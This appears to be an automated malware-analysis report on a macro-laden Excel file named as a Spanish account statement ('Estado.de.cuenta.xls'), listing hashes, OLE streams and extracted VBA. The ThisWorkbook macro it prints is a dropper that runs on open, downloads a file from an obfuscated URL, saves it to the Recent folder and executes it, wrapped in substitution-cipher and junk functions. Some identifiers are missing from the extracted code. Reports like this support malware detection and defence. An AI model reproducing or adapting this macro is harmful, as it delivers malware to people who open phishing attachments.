                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Last Saved By: oplup, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Dec 6 20:43:11 2018, Last Saved Time/Date: Thu Dec 12 15:41:34 2024, Security: 0
                                              Entropy (8bit):6.275307414840059
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 47.99%
                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                              File name:Estado.de.cuenta.xls
                                              File size:69'120 bytes
                                              MD5:0e3fccb0710d5f645343f0e2085921f2
                                              SHA1:e9122949ab988638db6d8c0af8817b6ea9aa32a3
                                              SHA256:fcc55ce7ed8adcf68a39bcd131de11e4be7b55899f35614fc67b4ce6ae0d6c0f
                                              SHA512:70bfff4861e49b25fb7cc9eac296d70a84c6fee9f30091efeb4c5ae364d34fd9ce034b4e15d96013093c9fb3eadc1f850d73e9df63749e3ba6df57e8d853d6db
                                              SSDEEP:1536:bKxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAzXo4inBGp9tRG52yrTQhBlKjq0LOTbl:bKxEtjPOtioVjDGUU1qfDlaGGx+cL2QE
                                              TLSH:DA63F851378DC499C94843394FE6C6EAAE37FC149E96434B3144B72E2FB5EA0C93360A
                                              File Content Preview:........................>...................................T..................................................................................................................................................................................................

                                              File Icon

                                              Icon Hash:276ea3a6a6b7bfbf

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "Estado.de.cuenta.xls"

                                              Indicators
                                              Has Summary Info:
                                              Application Name:Microsoft Excel
                                              Encrypted Document:False
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:False
                                              Flash Objects Count:0
                                              Contains VBA Macros:True
                                              Summary
                                              Code Page:1252
                                              Author:admin
                                              Last Saved By:oplup
                                              Create Time:2018-12-06 20:43:11
                                              Last Saved Time:2024-12-12 15:41:34
                                              Creating Application:Microsoft Excel
                                              Security:0
                                              Document Summary
                                              Document Code Page:1252
                                              Thumbnail Scaling Desired:False
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:917504

                                              Streams with VBA

                                              VBA File Name: Module1.bas, Stream Size: 960
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                                              VBA File Name:Module1.bas
                                              Stream Size:960
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . z . . . . . . . . . . . @ a b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . 6 . . . . . . < . . . . . . . < . . . . . . . < . . . . . . . . . . . . . . x . . . . . . . . . . "
                                              Data Raw:01 16 01 00 03 f0 00 00 00 bc 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff ea 02 00 00 7a 03 00 00 00 00 00 00 01 00 00 00 40 61 c4 62 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 04 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              VBA Code
                                              Attribute VB_Name = "Module1"
Sub book()
'
End Sub

                                              VBA File Name: Sheet1.cls, Stream Size: 985
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                              VBA File Name:Sheet1.cls
                                              Stream Size:985
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . ' . . . . . . . . . . . @ a . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                              Data Raw:01 16 01 00 01 f0 00 00 00 cc 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d3 02 00 00 27 03 00 00 00 00 00 00 01 00 00 00 40 61 a9 ed 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              VBA Code
                                              Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                              VBA File Name: Sheet2.cls, Stream Size: 985
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                              VBA File Name:Sheet2.cls
                                              Stream Size:985
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . ' . . . . . . . . . . . @ a . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                              Data Raw:01 16 01 00 01 f0 00 00 00 cc 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d3 02 00 00 27 03 00 00 00 00 00 00 01 00 00 00 40 61 c4 ce 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              VBA Code
                                              Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                              VBA File Name: Sheet3.cls, Stream Size: 985
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                              VBA File Name:Sheet3.cls
                                              Stream Size:985
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . ' . . . . . . . . . . . @ a C . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                              Data Raw:01 16 01 00 01 f0 00 00 00 cc 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d3 02 00 00 27 03 00 00 00 00 00 00 01 00 00 00 40 61 43 05 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              VBA Code
                                              Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                              VBA File Name: ThisWorkbook.cls, Stream Size: 7051
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                              VBA File Name:ThisWorkbook.cls
                                              Stream Size:7051
                                              Data ASCII:. . . . . . . . . L . . . . . . 8 . . . z . . . . . . . . . . . . . . . . . @ a 3 . . # . . . . . . . . . . . . . . . . . @ . . . . . . D . F ) ~ . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . [ G I a c . . . . . . . . . . . . . . . . . . . . . . x . . . . . [ G I a c . . . D . F ) ~ . . . . M E . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S L . . . . S . . . . . S . . . . 6 " . . . . . < . . . . . . . < . . . . . . . < . . . . . . . < . . . . . . . . . . N . 0 . { . 0
                                              Data Raw:01 16 01 00 03 00 01 00 00 4c 08 00 00 e4 00 00 00 38 02 00 00 7a 08 00 00 88 08 00 00 c0 11 00 00 08 00 00 00 01 00 00 00 40 61 33 80 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 40 00 ff ff 00 00 7f 1e cc ac bd d5 c1 44 85 01 46 99 29 96 e5 7e 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              VBA Code
                                              Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function ()
         = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ"
         = " @#$%^&*()_+|01456789bdghjklmqvwz.,-~AFGHJKMNQRTVWXZ?!23acefinoprstuxyBCDEILOPSUY"
        For u = 1 To Len()
             = InStr(, Mid(, u, 1))
            If  > 0 Then
                 = Mid(, , 1)
                 =  + 
            Else
                 =  + Mid(, u, 1)
            End If
        Next
         = 
    End Function

Function jumong() As Long

jumong = fyjdfjfjfghjftghfdyhjdfyygyjfhgyjfgjfgtux
fyjdfjfjfghjftghfdyhjdfyygyjfhgyjfgjfgtux As Byte
fyjdfjfjfghjftghfdyhjdfyygyjfhgyjfgjfgtux = 102
Call Axgfhhdfthdsthdf
Function Axgfhhdfthdsthdf()
Axgfhhdfthdsthdf
End Function

Sub Workbook_Open()
Dim WshShell As Object
Dim GetUserDesktop As String
Dim  As Integer
 = Chr(50) + Chr(48) + Chr(48)
  

    Set WshShell = CreateObject("WScript.Shell")
    GetUserDesktop = WshShell.SpecialFolders("Recent")
Dim 
Dim 
Dim 
Dim 
Dim 
Dim  As Integer
Dim 
Dim 
 = 1




Set  = CreateObject("microsoft.xmlhttp")
Set  = CreateObject("Shell.Application")

 = GetUserDesktop + ("\VZVQXT.")
.Open "get", ("h://www.m.m/djgzlkkzkgNbgggh/dhdjdjwwwghdww/gdhjhjghggjhdhh/dgz/hzdhhz."), False
.send
 = .responseBody
If .Status = 200 Then
Set  = CreateObject("adodb.stream")
.Open
.Type = 
.Write 
.SaveToFile ,  + 
.Close
End If
.Open ()
End Sub

Function WfgxfcGreanx() As Byte
WfgxfcGreanx = 100
Call xdfzfgxdb
Function xdfzfgxdb() As Boolean
xdfzfgxdb = False
Call Doorroom
Function Doorroom() As Double
Doorroom = Doorroom
Call yormmmom
Function yormmmom() As Variant
yormmmom = jumong
End Function

                                              Streams

                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 107
                                              General
                                              Stream Path:\x1CompObj
                                              CLSID:
                                              File Type:data
                                              Stream Size:107
                                              Entropy:4.184829500435969
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              CLSID:
                                              File Type:data
                                              Stream Size:244
                                              Entropy:2.9042242012830974
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
                                              General
                                              Stream Path:\x5SummaryInformation
                                              CLSID:
                                              File Type:data
                                              Stream Size:208
                                              Entropy:3.536852300806355
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a d m i n . . . . . . . . . . . o p l u p . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . 4 M . @ . . . . R L . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00
                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 41460
                                              General
                                              Stream Path:Workbook
                                              CLSID:
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:41460
                                              Entropy:6.999667620012466
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . \\ . p . . . . o p l u p B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . Z . S C : 8 . . . . . . . X . @ . . . . . . . . . .
                                              Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 6f 70 6c 75 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 637
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                              CLSID:
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:637
                                              Entropy:5.181386114087447
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . M o d u l e = M o d u l e 1 . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2
                                              Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d
                                              Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 128
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                              CLSID:
                                              File Type:data
                                              Stream Size:128
                                              Entropy:3.225887155982128
                                              Base64 Encoded:False
                                              Data ASCII:M o d u l e 1 . M . o . d . u . l . e . 1 . . . T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                              Data Raw:4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5293
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                              CLSID:
                                              File Type:data
                                              Stream Size:5293
                                              Entropy:5.588123947392458
                                              Base64 Encoded:False
                                              Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                              Data Raw:cc 61 94 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1632
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                              CLSID:
                                              File Type:data
                                              Stream Size:1632
                                              Entropy:4.425990994533497
                                              Base64 Encoded:False
                                              Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ i . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . P > ? l A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . i . . . . . . . . . . . .
                                              Data Raw:93 4b 2a 94 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 228
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                              CLSID:
                                              File Type:data
                                              Stream Size:228
                                              Entropy:4.261024303370967
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . b . . . V . . . . . . .
                                              Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 09 00 00 00 00 00 05 00 ff ff ff ff ff ff ff ff ff ff ff ff 03 00 00 09 19 03 00 00 00 00 00 00 69 06 00 00 00 00 00 00 08 00 00 00 00 00 01 00 19 00 00 08 62 00 00 00 b7 a5 b0 b0 a1 b3
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 84
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                              CLSID:
                                              File Type:data
                                              Stream Size:84
                                              Entropy:1.9112050925821995
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . . . . . . . . ~ | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k . . . . . . .
                                              Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 02 00 00 7e 7c 00 00 7f 00 00 00 00 0e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 08 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff 04 00 00 12 00 00 6b 00 00 7f 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 104
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                              CLSID:
                                              File Type:data
                                              Stream Size:104
                                              Entropy:1.8791610310005664
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . n . . . . . . .
                                              Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 08 00 00 00 04 00 24 00 81 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6e 00 00 7f 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_4, File Type: data, Stream Size: 508
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_4
                                              CLSID:
                                              File Type:data
                                              Stream Size:508
                                              Entropy:2.298399822472382
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . + . 8 . . . i . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 05 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 f1 05 00 00 00 00 00 00 19 06 00 00 00 00 00 00 41 06 00 00 00 00 00 00 ff ff ff ff c9 05 00 00 00 00 00 00 08 00 2b 00 38 00 00 00 69 06 00 00 00 00 00 00 61 00 00 00 00 00 01 00 91 06
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_5, File Type: data, Stream Size: 422
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_5
                                              CLSID:
                                              File Type:data
                                              Stream Size:422
                                              Entropy:2.6991507280960803
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . 0 . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . / . / . ( . A . . . . . . . . . . ` . . . . . . . . . . . . . . ( . ( . . . . . . . . . . . ` . . . . . . . . . . . . . . / . $ . . . . . . . . . . . ` . . ! . . . . . . . . . . . . . ( . . . . . . . . . . . . ` . . % . . . . . . . . . . . % . ( . A . . . . . . . . . . ` . . ) . . . . . . . . . . . # . ( . . . . . . . . . . . ` . . - . . . . . . . . . . . +
                                              Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff 00 00 00 00 44 00 00 00 04 00 30 00 01 01 00 00 00 00 04 00 00 00 03 60 08 01 15 04 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 81 00 00 00 00 00 01 00 ff ff ff ff 00 00 00 00 1e 00 2f 00 2f 00 28 00 41 01 00 00 00 00 04 00 01 00 03 60 04 01 19 04 ff ff ff ff
                                              Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: MIPSEB ECOFF executable not stripped - version 72.3, Stream Size: 612
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                              CLSID:
                                              File Type:MIPSEB ECOFF executable not stripped - version 72.3
                                              Stream Size:612
                                              Entropy:6.400776705551806
                                              Base64 Encoded:True
                                              Data ASCII:. ` . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . P n i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                              Data Raw:01 60 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 8b 50 6e 69 0d 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                              Network Behavior

